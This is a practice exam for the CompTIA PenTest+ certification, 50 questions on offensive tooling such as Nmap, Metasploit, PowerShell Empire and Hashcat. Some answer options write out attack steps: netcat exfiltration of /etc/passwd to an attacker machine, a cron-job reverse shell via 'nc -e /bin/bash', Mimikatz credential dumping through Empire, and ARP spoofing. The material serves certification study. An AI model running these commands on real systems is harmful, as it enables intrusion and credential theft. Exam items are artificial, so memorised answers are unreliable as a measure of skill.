Free CompTIA PenTest+ Practice Exam


What is DNS lookup?

Question 1 of 50


Write down the command to perform OSINT using theHarvester while targeting using all of the search engines available to the tool and output the results into a file called theHarvester_google.html.

Question 2 of 50


What is the purpose of Shodan?

Question 3 of 50


Can we use -Pn and -sn Nmap switches in the same command?

Question 4 of 50


Which of these tools can be used to perform URL enumeration?

Question 5 of 50


What’s the difference between Nmap’s -sS and -sT scans?

Question 6 of 50


Name the Nmap’s timing options from 0-5.

Question 7 of 50


What are the file formats Nessus can export its report into?

Question 8 of 50


What tool would we use to perform website scraping, and which one for website crawling?

Question 9 of 50


Is it possible to run the following Nmap command: nmap -Pn -sn -p- -T5 -O -A -sS -sT -sUV?

Question 10 of 50


Is there a way to ensure validity of exploits found on Exploit DataBase?

Question 11 of 50


Name a good resource to keep yourself updated with the latest developments in the cyber security industry.

Question 12 of 50


Create a chain of commands to perform ARP spoofing using Bettercap. Assume that your network interface is eth0 and the target IP address is TARGET.

  • arp.spoof on
  • set arp.spoof.targets TARGET
  • bettercap --iface eth0
  • set arp.spoof.fullduplex true
  • help arp.spoof
  • help

Question 13 of 50


What is the main difference between John the Ripper and Hashcat in the way they crack passwords?

Question 14 of 50


Can a NIC’s MAC address be changed?

Question 15 of 50


What is the difference between an LHOST and an RHOST in Metasploit Framework?

Question 16 of 50


How would you transfer an /etc/passwd file from a compromised Linux system onto your attacking Kali machine using Netcat?The IP addresses are TARGET and KALI respectively.

  • On Kali
  • nc -lvnp PORT > target_passwd
  • nc KALI PORT < /etc/passwd
  • On the target shell

Question 17 of 50


Create an SQLi query that would read the contents of all the other columns while the 'user' column contains the value of 'admin' from the table 'users' within the current database.

Question 18 of 50


What are some of the main types of attacks we can perform after leveraging an XSS vulnerability?

Question 19 of 50


Which of these are we most commonly looking for when testing for vulnerabilities using a web proxy?

Question 20 of 50


When giving complex parameters to SQLMap how do we ensure they are interpreted correctly by the tool?

Question 21 of 50


Besides the preinstalled wordlists found in Kali what other, major wordlist pack can we install?

Question 22 of 50


What’s the difference between phishing, spear phishing and whaling when it comes to social engineering?

Question 23 of 50


Which of these can be achieved through a watering hole attack?

Question 24 of 50


What is the name of a tool that can greatly increase the impact of our XSS attacks?

Question 25 of 50


What other tools does PowerShell Empire integrate well with?

Question 26 of 50


Create a chain of commands to use Mimikatz from within PowerShell Empire.

  • execute
  • service apache2 start
  • set Port 1234
  • execute
  • execute
  • usemodule powershell/credentials/mimikatz/logonpasswords
  • set Listener http
  • uselistener http
  • usestager windows/launcher_bat
  • cp /tmp/launcher.bat /var/www/html
  • Download and run the launcher.bat file using the target shell or GUI
  • powershell-empire

Question 27 of 50


BloodHound presents data to us using?

Question 28 of 50


Which Windows tools/services can we piggyback on through CrackMapExec?

Question 29 of 50


If / is allowed but no other command on a target system how can we escape from a restricted shell?

Question 30 of 50


Write the command to create a Trojan using MSFVenom, LHOST being ATTACKER and the LPORT being PORT. The target machine is Linux, architecture x86 and the output file called VIRUS

Question 31 of 50


Which of the following can be used to create reverse or bind shells to a target system?

Question 32 of 50


Create a chain of commands to exploit a Cron job to achieve privilege escalation.

  • echo “#!/bin/bash”>/tmp/
  • chmod 777 /tmp/
  • crontab -l
  • Identify a Cron job * * * * * /tmp/
  • nc -lvnp 2345
  • echo “nc 2345 -e /bin/bash”>>/tmp/

Question 33 of 50


How do we cover our tracks if the shell we have is Meterpreter?

Question 34 of 50


Which of the following are steganography tools?

Question 35 of 50


Write a Bash loop that will print all numbers from 56 to 128 in increments of 5.

Question 36 of 50


What are “conditionals” in programming?

Question 37 of 50


What does the following command do:

nikto -h -Format html -o nikto_apple -Tuning 1

Question 38 of 50


How do we deal with Cookie based authentication on a target URL called TARGET when using Wapiti?

Question 39 of 50


Which particular item is necessary to make the most out of WPScan?

Question 40 of 50


Fill in the gaps in the command to perform password cracking using Hashcat on a hash file called “hash”, where the hash type is sha512crypt using the /usr/share/wordlists/rockyou.txt wordlist.

hashcat 1800 -a hash /usr/share/wordlists/rockyou.txt hash

Question 41 of 50


Which of the following are services that THC-Hydra can attack?

Question 42 of 50

When using a debugger for exploit development, ideally we want to achieve consistent control over which registry?

Question 43 of 50

Name at least 3 wireless analysis and exploitation tools.

Question 44 of 50

Which of the following is the wireless parameter most commonly needed in wireless attacks?

Question 45 of 50

What is SSH?

Question 46 of 50


Write a command to run a basic Nmap port scan against a machine with the IP address of TARGET , but send the scan through a proxy.

Question 47 of 50


There are two ways how you can “install” and run Powersploit on a Windows target. What are they?

Question 48 of 50


In order to capture credentials using Responder what condition needs to be met?

Question 49 of 50


Which of the following can be used to achieve Remote Code Execution (RCE) on a Windows target with known credentials using Impacket?

Question 50 of 50


comptia pentest+ book

Buy the book on Amazon.

101 Labs Newsletter